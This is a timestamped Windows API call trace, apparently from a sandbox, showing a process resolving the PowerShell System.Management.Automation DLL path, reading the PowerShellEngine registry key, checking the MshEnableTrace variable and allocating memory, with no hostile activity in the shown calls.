	[0687.761] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0687.761] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0687.762] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0687.762] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0687.762] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0687.763] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0687.763] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0687.763] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0687.763] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d758 | out: phkResult=0x26d758*=0x38c) returned 0x0
	[0687.763] RegQueryValueExW (in: hKey=0x38c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d6dc, lpData=0x0, lpcbData=0x26d6d8*=0x0 | out: lpType=0x26d6dc*=0x1, lpData=0x0, lpcbData=0x26d6d8*=0x56) returned 0x0
	[0687.763] CoTaskMemAlloc (cb=0x5a) returned 0x3c0610
	[0687.763] RegQueryValueExW (in: hKey=0x38c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d6ac, lpData=0x3c0610, lpcbData=0x26d6a8*=0x56 | out: lpType=0x26d6ac*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d6a8*=0x56) returned 0x0
	[0687.764] CoTaskMemFree (pv=0x3c0610) 
	[0687.764] RegCloseKey (hKey=0x38c) returned 0x0
	[0687.764] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0687.764] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0687.764] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0687.765] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0687.766] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0687.766] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0687.772] CoTaskMemAlloc (cb=0x104) returned 0x44be40
	[0687.772] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44be40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0687.772] CoTaskMemFree (pv=0x44be40) 
	[0687.772] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0687.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0687.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0687.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0687.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0687.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0687.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0687.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0687.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0687.775] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0687.775] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0687.775] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0687.776] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0687.776] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0687.776] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0687.777] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0687.777] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0687.777] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0687.777] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0687.777] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0687.777] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0687.778] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0687.778] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0687.778] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0687.778] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0689.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0689.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0689.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0689.527] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0689.527] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0689.527] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0689.527] VirtualQuery (in: lpAddress=0x26b7b0, lpBuffer=0x26c670, dwLength=0x30 | out: lpBuffer=0x26c670*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0689.532] CoTaskMemAlloc (cb=0x104) returned 0x44be40
	[0689.532] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44be40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0689.532] CoTaskMemFree (pv=0x44be40) 
	[0689.540] CoTaskMemAlloc (cb=0x104) returned 0x44be40
	[0689.540] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44be40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0689.541] CoTaskMemFree (pv=0x44be40) 
	[0691.480] CoTaskMemAlloc (cb=0x104) returned 0x44be40
	[0691.480] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44be40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0691.480] CoTaskMemFree (pv=0x44be40) 
	[0691.480] CoTaskMemAlloc (cb=0x104) returned 0x44be40
	[0691.480] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44be40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0691.480] CoTaskMemFree (pv=0x44be40) 
	[0691.484] CoTaskMemAlloc (cb=0x104) returned 0x44be40
	[0691.484] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44be40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0691.484] CoTaskMemFree (pv=0x44be40) 
	[0691.489] CoTaskMemAlloc (cb=0x104) returned 0x44be40
	[0691.489] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44be40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0691.490] CoTaskMemFree (pv=0x44be40) 
	[0691.491] CoTaskMemAlloc (cb=0x104) returned 0x44be40
	[0691.491] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44be40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0691.491] CoTaskMemFree (pv=0x44be40) 
	[0691.498] VirtualQuery (in: lpAddress=0x26b7b0, lpBuffer=0x26c670, dwLength=0x30 | out: lpBuffer=0x26c670*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0699.787] CoTaskMemAlloc (cb=0x104) returned 0x44be40
	[0699.787] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44be40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0699.787] CoTaskMemFree (pv=0x44be40) 
	[0705.735] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x44bf50
	[0705.743] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x44c060
	[0723.648] VirtualQuery (in: lpAddress=0x26b7b0, lpBuffer=0x26c670, dwLength=0x30 | out: lpBuffer=0x26c670*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0723.649] VirtualQuery (in: lpAddress=0x26b7b0, lpBuffer=0x26c670, dwLength=0x30 | out: lpBuffer=0x26c670*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0723.650] VirtualQuery (in: lpAddress=0x26b7b0, lpBuffer=0x26c670, dwLength=0x30 | out: lpBuffer=0x26c670*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0723.651] CoTaskMemAlloc (cb=0x104) returned 0x44c170
	[0723.651] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44c170, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0723.651] CoTaskMemFree (pv=0x44c170) 
	[0723.654] CoTaskMemAlloc (cb=0x104) returned 0x44c170
	[0723.654] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44c170, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0723.654] CoTaskMemFree (pv=0x44c170) 
	[0725.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0725.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0725.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0725.299] VirtualQuery (in: lpAddress=0x26ba60, lpBuffer=0x26c920, dwLength=0x30 | out: lpBuffer=0x26c920*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0725.306] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d8b8 | out: phkResult=0x26d8b8*=0x390) returned 0x0
	[0725.306] RegQueryValueExW (in: hKey=0x390, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d83c, lpData=0x0, lpcbData=0x26d838*=0x0 | out: lpType=0x26d83c*=0x1, lpData=0x0, lpcbData=0x26d838*=0x56) returned 0x0
	[0725.306] CoTaskMemAlloc (cb=0x5a) returned 0x1ba79610
	[0725.306] RegQueryValueExW (in: hKey=0x390, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d80c, lpData=0x1ba79610, lpcbData=0x26d808*=0x56 | out: lpType=0x26d80c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d808*=0x56) returned 0x0
	[0725.306] CoTaskMemFree (pv=0x1ba79610) 
	[0725.307] RegCloseKey (hKey=0x390) returned 0x0
	[0725.307] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d8b8 | out: phkResult=0x26d8b8*=0x390) returned 0x0
	[0725.307] RegQueryValueExW (in: hKey=0x390, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d83c, lpData=0x0, lpcbData=0x26d838*=0x0 | out: lpType=0x26d83c*=0x1, lpData=0x0, lpcbData=0x26d838*=0x56) returned 0x0
	[0725.307] CoTaskMemAlloc (cb=0x5a) returned 0x1ba79610
	[0725.307] RegQueryValueExW (in: hKey=0x390, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d80c, lpData=0x1ba79610, lpcbData=0x26d808*=0x56 | out: lpType=0x26d80c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d808*=0x56) returned 0x0
	[0725.307] CoTaskMemFree (pv=0x1ba79610) 
	[0725.307] RegCloseKey (hKey=0x390) returned 0x0
	[0725.308] CoTaskMemAlloc (cb=0x20c) returned 0x1ba3d970
